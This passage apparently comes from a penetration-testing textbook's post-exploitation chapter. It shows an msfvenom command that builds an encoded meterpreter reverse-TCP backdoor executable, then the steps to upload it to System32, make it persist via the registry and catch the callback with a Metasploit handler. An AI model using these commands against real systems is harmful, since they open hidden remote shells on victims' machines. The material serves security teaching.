Postexploitation
◾
247
To generate an encoded executable, we will use the following command:
root@bt:~# msfvenom –p windows/meterpreter/reverse_tcp –e x86/shikata_ga_
nai –i 5 LHOST = 192.168.75.144 LPORT = 4444 –f exe >/root/Desktop/
backdoor.exe
We can see that our backdoor succeeded with five iterations. Now it’s time to upload our back-
door to the target machine and make it persistent just like we did with netcat. We use the same
commands to accomplish our goal.
Command
:
upload/root/Desktop/backdoor.exe C:\\Windows\\System32
Next we make our backdoor persistent by making changes to the registry.
Once our registry value has been set, as soon as Windows reboots, our backdoor starts making
connections to the lhost we provided. So in order to receive the connection, we need to set up a
handler.
We can set up a handler by issuing the following command from the Metasploit console:
use exploit/multi/handler
Next we need to define LHOST and LPORT, which we defined while we created the backdoor.
As soon as Windows reboots, a meterpreter session will be opened again:
Dostları ilə paylaş: